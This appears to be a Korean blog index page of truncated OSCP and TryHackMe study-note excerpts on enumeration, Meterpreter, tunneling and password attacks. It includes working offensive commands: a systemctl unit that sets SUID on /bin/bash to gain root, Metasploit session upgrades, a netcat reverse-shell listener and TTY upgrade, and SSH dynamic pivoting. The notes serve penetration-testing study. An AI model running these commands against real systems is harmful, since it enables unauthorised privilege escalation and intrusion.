OSCP 97

[Linux] Kenobi

Kenobi Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation. NMAP -> RPC, NFS, FTP, SMB, SSH 1. smbclient, smbget 2. Nmap nfs 스크립트 검색 (rpcbind) 3. NC로 FTP 배너그래빙 -> searchsploit -> Proftp copy exploit-> 1에서 얻은 로그파일 정보로 위치 파악, ssh개인키를 마운트된 폴더에 복사 -> 내 PC로 mount하여 개인키 다운로드 -> SS..

OSCP/TryHackMe 2020.04.14

Meterpreter

미터프리터 전환 방법 두가지 - 백그라운드 전환 후 (컨트롤+z) 첫번째, sessions -u 1 두번째, use post/multil/manage/shell_to_meterpreter msf post(shell_to_meterpreter) > set session 1 msf post(shell_to_meterpreter) > exploit 참고: https://www.hackingarticles.in/command-shell-to-meterpreter/ we can use “-u” (option) with the session ID for upgrading our shell into meterpreter session. Exploit 후 프로세스 migrate하기 - 해쉬덤프전 수행해야하는 단계 우리..

Systemctl

https://gtfobins.github.io/gtfobins/systemctl/ 1. systemctl 경로를 환경에 맞게 수정 2. bash 권한에 스티키 비트 추가 구문 수정 TF=$(mktemp).service echo '[Service] Type=oneshot ExecStart=/bin/sh -c "chmod +s /bin/bash" [Install] WantedBy=multi-user.target' > $TF ./systemctl link $TF ./systemctl enable --now $TF 위 명령 실행 후.. 스티키비트 생성 확인 $ ls -l /bin/bash 루트 권한 확인 $ /bin/bash -p -p: posix모드..? $ id

Nmap, Gobuster, JohnTheRipper

Nmap -p-: scan all port -Pn: Disable host discovery and just scan for open ports -sV: Service Scan -sC: Scan with the default nmap scripts -A: Enables OS and version detection, executes in-build scripts for further enumeration nmap -sV -vv --script vuln TARGET_IP 포트 명시 안하면 기본적으로 1000개를 검색한다. --script vuln : 스크립트 파일명에 vuln이 포함된 nse파일을 검색한다. GoBuster flag gobuster dir -u http://:3333 -w Descriptio..

Pivoting, 터널링, 포트포워딩, SSH, 프록시, Proxychains

방대한 피봇 프로그램 사용법 가이드 https://artkond.com/2017/03/23/pivoting-guide/#rpivot SSH서버, proxychains, 메타스플로잇 Pivot, 더블 pivot https://pentest.blog/explore-hidden-networks-with-double-pivoting/ putty 프록시 설정 http://blog.daum.net/99445015/232 리눅스 SSH Server(SOCK Proxy) 생성, 웹브라우저 설정 https://ma.ttias.be/socks-proxy-linux-ssh-bypass-content-filters/ OCSP 포트포워딩, 터널링 치트시트 https://xapax.gitbooks.io/security/conte..

명령어 정리 1

* rlwrap을 사용하면 이전 명령어가 히스토리에 기록되기 때문에 그냥 넷켓 사용보다 편리함 (but offsec VM 설치 불가...) rlwrap nc -lnvp 1234 쉘 환경 구성 https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ In Reverse shell $ python -c "import pty;pty.spawn('/bin/bash')" $ www-data$ ^Z Kali kali$ stty size (rows,columns 크기 체크) kali$ stty raw -echo kali$ fg In Reverse shell $ reset $ export SHELL=bash $ export TERM=xterm..

OSCP/시험대비 2020.03.24

15. Port Redirection and Tunneling - 2 (Dynamic, Proxychain,http터널링)

15.2.3 - Dynamic Port Forwarding (어려움) 이제 재미있는 부분이 있습니다. SSH 동적 포트 포워딩을 통해 로컬 수신 포트를 설정하고 프록시를 통해 들어오는 트래픽을 원격 대상으로 터널링 할 수 있습니다. 다음 시나리오를 고려하십시오. 웹 공격을 사용하여 DMZ 서버를 손상 시켰으며 루트 권한을 에스컬레이션했습니다. 이 서버에는 포트 80과 포트 2222가 모두 인터넷에 노출되어 있습니다. 우리의 로컬 공격 시스템에 포트 8080의 로컬 SOCKS4 프록시를 생성합니다. 이 공격은 손상된 웹 서버를 통해 DMZ 네트워크의 모든 호스트에서 들어오는 모든 트래픽을 터널링합니다. 다음 구문을 사용하여 SSH로 이 프록시를 생성할 수 있습니다. ssh -D -p -D: 다이나믹, 클라..

15. Port Redirection and Tunneling - 1 (Local,Remote)

15. - Port Redirection and Tunneling 15.1 - Port Forwarding/Redirection 요약: 다른 공용IP 네트워크 컴퓨터에 rinetd 서비스 설치 후 허용되는 포트를 구성, 원하는 대상에 포워딩시키기, rinetd는 리눅스 Tool 포트 포워딩 / 리디렉션은 가장 간단한 트래픽 조작 기술입니다. 지정된 IP 주소 및 포트에서 트래픽을 수락 한 다음 단순히 다른 IP 주소 및 포트로 리디렉션하는 과정이 포함됩니다. rinetd와 같은 간단한 포트 전달 도구는 편리하고 구성하기 쉽습니다. root@kali:~# apt-get install rinetd root@kali:~# cat /etc/rinetd.conf ... # bindadress bindport co..

12. - Client Side Attacks

* 실습은 windows7 머신 대상으로 집에서만 해볼 수 있다. 12. - Client Side Attacks 클라이언트 쪽 공격은 아마도 가장 교활한 형태의 원격 공격 일 것입니다. 클라이언트 측 공격은 컴퓨터에 액세스하기 위해 브라우저 (POP3 서버와 같은 서버 소프트웨어가 아닌)와 같은 클라이언트 소프트웨어의 취약점을 악용하는 것과 관련이 있습니다. 클라이언트 측 공격의 성실성은 공격자가 라우팅 할 수 있거나 직접 액세스 할 필요가없는 대상 컴퓨터에서 발생합니다. 라우팅 할 수없는 내부 네트워크의 직원이 악의적 인 웹 사이트 링크가 포함 된 전자 메일을받는 시나리오를 상상해보십시오. 직원이 링크를 클릭하면 패치되지 않은 Internet Explorer 브라우저의 악용 코드가 포함 된 HTML 페..

14. Password Attacks -2

꿑팁: 웬만한 툴들은 범위 공격가능함 (시간절약, 무차별대입 공격으로 인한 lock out 조심) 14.2 - Online Password Attacks 온라인 비밀번호 공격은 사용자 이름 및 비밀번호 인증 체계를 사용하는 네트워크 서비스에 대한 비밀번호 추측 시도를 포함한다. 여기에는 HTTP, SSH, VNC, FTP, SNMP, POP3 등의 서비스가 포함된다. 주어진 네트워크 서비스에 대한 암호 공격을 자동화할 수 있으려면, 우리는 해당 서비스에 의해 사용 중인 특정 프로토콜에 대한 인증 요청을 생성할 수 있어야 한다. 우리에게 다행스럽게도, Hidra, Medusa, Ncrack, 그리고 Metasploit와 같은 도구들은 많은 네트워크 프로토콜 인증 체계를 다루는데 내장되어 있다. 14.2.1..